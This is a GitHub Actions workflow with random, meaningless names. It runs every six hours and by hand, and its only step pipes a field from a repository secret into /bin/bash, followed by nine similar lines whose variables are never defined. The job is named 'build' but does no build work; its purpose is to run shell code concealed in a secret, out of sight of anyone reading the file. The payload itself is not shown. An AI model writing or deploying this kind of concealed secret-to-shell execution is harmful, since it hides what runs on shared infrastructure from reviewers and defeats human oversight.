name: lvhuaiqing4567

on:
  workflow_dispatch:
  schedule:
    - cron: '28 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lvhuaiqing4567
        env:
          pux02609: ${{ secrets.pux02609 }}
        run: |
          echo $pux02609 | jq -r .shc4 | /bin/bash
          echo $vuvit63 | jq -r .tp956 | /bin/bash
          echo $i33630 | jq -r .dh2351 | /bin/bash
          echo $yynwh992 | jq -r .gck65 | /bin/bash
          echo $j0 | jq -r .nxskx5 | /bin/bash
          echo $ag859 | jq -r .cg27 | /bin/bash
          echo $uey61 | jq -r .sdvmg00102 | /bin/bash
          echo $qbv4100 | jq -r .vlb18752 | /bin/bash
          echo $f23 | jq -r .ttc8079 | /bin/bash
          echo $wscm650 | jq -r .ccpe75 | /bin/bash

